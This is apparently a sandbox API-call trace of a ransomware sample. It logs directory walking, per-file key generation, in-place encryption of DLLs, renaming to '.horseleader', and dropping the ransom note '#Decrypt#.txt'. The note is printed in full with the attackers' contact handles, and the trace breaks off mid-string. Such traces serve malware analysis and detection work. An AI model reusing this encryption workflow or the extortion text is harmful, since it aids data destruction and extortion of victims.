ftLastAccessTime.dwLowDateTime=0x99d95dfd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x99dbbf5d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdfmap.dll", cAlternateFileName="")) returned 1 [0251.097] lstrcmpiW (lpString1="msdfmap.dll", lpString2="Windows") returned -1 [0251.097] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll") returned 58 [0251.097] StrStrIW (lpFirst="msdfmap.dll", lpSrch=".horseleader") returned 0x0 [0251.097] lstrcmpW (lpString1="msdfmap.dll", lpString2="#Decrypt#.txt") returned 1 [0251.097] lstrcmpW (lpString1="msdfmap.dll", lpString2="_uninstalling_.png") returned 1 [0251.097] lstrlenW (lpString=".testttjffg") returned 11 [0251.097] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll", lpSrch=".testttjffg") returned 0x0 [0251.097] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.098] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.098] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdfmap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.098] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d95dfd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x99d95dfd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x99dbbf5d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdfmap.dll", cAlternateFileName="")) returned 0 [0251.098] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0251.098] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\#Decrypt#.txt") returned 60 [0251.098] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\msadc\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0251.099] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.099] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0251.137] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.137] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0251.138] CloseHandle (hObject=0x21c) returned 1 [0251.138] GetProcessHeap () returned 0x780000 [0251.138] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0251.138] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="MSMAPI", cAlternateFileName="")) returned 1 [0251.138] lstrcmpiW (lpString1="MSMAPI", lpString2="Windows") returned -1 [0251.138] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI") returned 47 [0251.138] lstrcmpW (lpString1="MSMAPI", lpString2=".") returned 1 [0251.138] lstrcmpW (lpString1="MSMAPI", lpString2="..") returned 1 [0251.138] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.138] GetProcessHeap () returned 0x780000 [0251.138] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0251.138] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\*") returned 49 [0251.138] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0251.220] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.220] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\.") returned 49 [0251.220] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.220] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0251.220] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.220] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\..") returned 50 [0251.220] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.220] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.220] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="1033", cAlternateFileName="")) returned 1 [0251.220] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0251.248] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033") returned 52 [0251.248] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0251.248] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0251.256] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.256] GetProcessHeap () returned 0x780000 [0251.256] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.256] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*") returned 54 [0251.256] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.257] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.257] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\.") returned 54 [0251.257] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.257] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="..", cAlternateFileName="")) returned 1 [0251.257] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.257] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\..") returned 55 [0251.257] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.257] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.257] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324d2e00, ftCreationTime.dwHighDateTime=0x1caca25, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x324d2e00, ftLastWriteTime.dwHighDateTime=0x1caca25, nFileSizeHigh=0x0, nFileSizeLow=0xe580, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="MSMAPI32.DLL", cAlternateFileName="")) returned 1 [0251.257] lstrcmpiW (lpString1="MSMAPI32.DLL", lpString2="Windows") returned -1 [0251.257] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL") returned 65 [0251.258] StrStrIW (lpFirst="MSMAPI32.DLL", lpSrch=".horseleader") returned 0x0 [0251.258] lstrcmpW (lpString1="MSMAPI32.DLL", lpString2="#Decrypt#.txt") returned 1 [0251.258] lstrcmpW (lpString1="MSMAPI32.DLL", lpString2="_uninstalling_.png") returned 1 [0251.258] lstrlenW (lpString=".testttjffg") returned 11 [0251.258] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL", lpSrch=".testttjffg") returned 0x0 [0251.258] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.258] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.258] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\msmapi32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0251.259] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL") returned 65 [0251.259] StrStrW (lpFirst="MSMAPI32.DLL", lpSrch=".txt") returned 0x0 [0251.259] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=58752) returned 1 [0251.259] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0251.265] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.266] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0251.266] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0251.267] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.268] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0251.268] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4580, lpOverlapped=0x0) returned 1 [0251.268] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffba80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.268] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4580, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4580, lpOverlapped=0x0) returned 1 [0251.269] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.269] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0251.269] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0251.269] CloseHandle (hObject=0x1a4) returned 1 [0251.269] GetProcessHeap () returned 0x780000 [0251.269] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0251.270] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL.horseleader") returned 77 [0251.270] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\msmapi32.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL.horseleader" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\msmapi32.dll.horseleader")) returned 1 [0251.271] GetProcessHeap () returned 0x780000 [0251.271] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0251.271] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324d2e00, ftCreationTime.dwHighDateTime=0x1caca25, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x324d2e00, ftLastWriteTime.dwHighDateTime=0x1caca25, nFileSizeHigh=0x0, nFileSizeLow=0xe580, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="MSMAPI32.DLL", cAlternateFileName="")) returned 0 [0251.271] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.271] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\#Decrypt#.txt") returned 66 [0251.271] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.272] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.272] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.273] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.273] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.273] CloseHandle (hObject=0x158) returned 1 [0251.273] GetProcessHeap () returned 0x780000 [0251.273] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.273] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="1033", cAlternateFileName="")) returned 0 [0251.274] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0251.274] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\#Decrypt#.txt") returned 61 [0251.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\msmapi\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0251.274] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the 